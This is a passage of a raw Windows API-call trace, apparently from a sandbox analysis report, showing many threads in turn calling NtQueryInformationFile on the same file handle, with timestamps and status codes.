NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfad8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfad8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1269 os_tid = 0xc0 [0153.651] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1270 os_tid = 0x360 [0153.654] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf8c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf8c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1271 os_tid = 0x920 [0153.656] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1272 os_tid = 0xbec [0153.658] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1273 os_tid = 0x6b8 [0153.660] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf850, FileInformation=0x44d8098) returned 0x0 Thread: id = 1274 os_tid = 0x30c [0153.661] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f7d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f7d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1275 os_tid = 0xbfc [0153.663] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1276 os_tid = 0x3f8 [0153.664] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1277 os_tid = 0x6cc [0153.666] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efbc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efbc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1278 os_tid = 0x830 [0153.668] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf9f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf9f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1279 os_tid = 0x75c [0153.670] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f930, FileInformation=0x44d8098) returned 0x0 Thread: id = 1280 os_tid = 0x7f0 [0153.671] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfde0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfde0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1281 os_tid = 0x710 [0153.673] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff8e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff8e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1282 os_tid = 0x5d8 [0153.675] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1283 os_tid = 0xbe4 [0153.677] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1284 os_tid = 0x600 [0153.678] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1285 os_tid = 0xbd0 [0153.680] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f9e0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1286 os_tid = 0x158 [0153.681] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe88, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1287 os_tid = 0xbd8 [0153.683] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfeb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfeb0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1288 os_tid = 0xbe8 [0153.684] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fae8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fae8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1289 os_tid = 0xbdc [0153.686] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f860, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f860, FileInformation=0x44d8098) returned 0x0 Thread: id = 1290 os_tid = 0x5b4 [0153.687] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fae0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fae0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1291 os_tid = 0x614 [0153.689] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fda0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1292 os_tid = 0x690 [0153.690] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff828, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff828, FileInformation=0x44d8098) returned 0x0 Thread: id = 1293 os_tid = 0xa68 [0153.692] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afa18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afa18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1294 os_tid = 0x7d0 [0153.694] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf9f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf9f0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1295 os_tid = 0x7d8 [0153.695] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff78, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1296 os_tid = 0x24c [0153.697] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff808, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff808, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1297 os_tid = 0x9f8 [0153.699] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afe08, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1298 os_tid = 0x798 [0153.700] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1299 os_tid = 0xa3c [0153.702] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1300 os_tid = 0x8c0 [0153.704] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fc48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fc48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1301 os_tid = 0x708 [0153.705] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfdd8, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1302 os_tid = 0xa64 [0153.707] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fe88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fe88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1303 os_tid = 0xa30 [0153.709] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fba8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fba8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1304 os_tid = 0x388 [0153.710] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1305 os_tid = 0x760 [0153.712] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef970, FileInformation=0x44d8098) returned 0x0 Thread: id = 1306 os_tid = 0xa54 [0153.714] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fb70, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1307 os_tid = 0x738 [0153.715] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fb78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fb78, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1308 os_tid = 0x488 [0153.717] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe90, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1309 os_tid = 0x6dc [0153.718] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fee8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fee8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1310 os_tid = 0x7a0 [0153.720] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f7e8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1311 os_tid = 0x73c [0153.721] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fcc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fcc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1312 os_tid = 0x1c0 [0153.723] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe60, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1313 os_tid = 0x7c4 [0153.724] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efeb8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1314 os_tid = 0x790 [0153.726] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc80, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1315 os_tid = 0x688 [0153.727] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f990, FileInformation=0x44d8098) returned 0x0 Thread: id = 1316 os_tid = 0x240 [0153.729] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f930, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f930, FileInformation=0x44d8098) returned 0x0 Thread: id = 1317 os_tid = 0x8e0 [0153.731] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f958, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1318 os_tid = 0x880 [0153.732] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1319 os_tid = 0x8f0 [0153.734] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1320 os_tid = 0xa18 [0153.735] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f940, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f940, FileInformation=0x44d8098) returned 0x0 Thread: id = 1321 os_tid = 0x8a0 [0153.737] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1322 os_tid = 0x870 [0153.738] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfbb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfbb0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1323 os_tid = 0x9a0 [0153.740] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fbf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fbf0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1324 os_tid = 0x2c4 [0153.742] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1325 os_tid = 0x890 [0153.743] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efe58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efe58, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1326 os_tid = 0x4e8 [0153.745] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f920, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1327 os_tid = 0xcc [0153.746] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1328 os_tid = 0xd0 [0153.748] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfc68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfc68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1329 os_tid = 0xd4 [0153.749] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff48, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1330 os_tid = 0xd8 [0153.751] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fd90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fd90, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1331 os_tid = 0xdc [0153.752] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481feb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481feb0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1332 os_tid = 0xe0 [0153.754] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fc28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fc28, FileInformation=0x44d8098) returned 0xc00000bb Thread: id = 1333 os_tid = 0xe4 [0153.755] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff58, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1334 os_tid = 0xe8 [0153.757] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfc98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfc98, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1335 os_tid = 0xec [0153.758] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1336 os_tid = 0x748 [0153.760] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1337 os_tid = 0xc4 [0153.762] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fdb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fdb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1338 os_tid = 0x620 [0153.763] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfcf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfcf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1339 os_tid = 0x910 [0153.765] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff828, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff828, FileInformation=0x44d8098) returned 0x0 Thread: id = 1340 os_tid = 0x950 [0153.767] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1341 os_tid = 0x940 [0153.770] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fe90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fe90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1342 os_tid = 0x980 [0153.772] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1343 os_tid = 0xa10 [0153.773] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f8a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1344 os_tid = 0x72c [0153.775] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f7f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1345 os_tid = 0x9e0 [0153.777] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fd28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fd28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1346 os_tid = 0x9c4 [0153.778] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf9e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1347 os_tid = 0xa6c [0153.780] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1348 os_tid = 0xb00 [0153.781] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1349 os_tid = 0xaf8 [0153.783] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f9d8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1350 os_tid = 0xae4 [0153.785] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc88, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1351 os_tid = 0x344 [0153.786] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fde0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fde0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1352 os_tid = 0x808 [0153.789] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f970, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f970, FileInformation=0x44d8098) returned 0x0 Thread: id = 1353 os_tid = 0x858 [0153.791] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f7f0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1354 os_tid = 0x224 [0153.793] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485feb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485feb0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1355 os_tid = 0x4dc [0153.795] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f800, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f800, FileInformation=0x44d8098) returned 0x0 Thread: id = 1356 os_tid = 0x78c [0153.797] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1357 os_tid = 0xb0 [0153.798] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f840, FileInformation=0x44d8098) returned 0x0 Thread: id = 1358 os_tid = 0x314 [0153.800] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fa48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fa48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1359 os_tid = 0x804 [0153.802] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe30, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1360 os_tid = 0x854 [0153.803] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fac8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1361 os_tid = 0xa78 [0153.805] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfeb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1362 os_tid = 0x7a8 [0153.806] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef960, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef960, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1363 os_tid = 0x330 [0153.808] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f848, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f848, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1364 os_tid = 0x3a4 [0153.809] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffcf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffcf8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1365 os_tid = 0x67c [0153.811] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fc08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fc08, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1366 os_tid = 0x5cc [0153.813] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fc58, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1367 os_tid = 0x840 [0153.814] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1368 os_tid = 0x69c [0153.816] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fbb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fbb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1369 os_tid = 0x6f0 [0153.821] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1370 os_tid = 0x810 [0153.823] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fd30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1371 os_tid = 0xa88 [0153.825] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fd18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fd18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1372 os_tid = 0x43c [0153.826] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fa10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fa10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1373 os_tid = 0x670 [0153.828] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fce0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fce0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1374 os_tid = 0xa14 [0153.830] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf7b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf7b8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1375 os_tid = 0x990 [0153.831] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f900, FileInformation=0x44d8098, Length=0x10000, 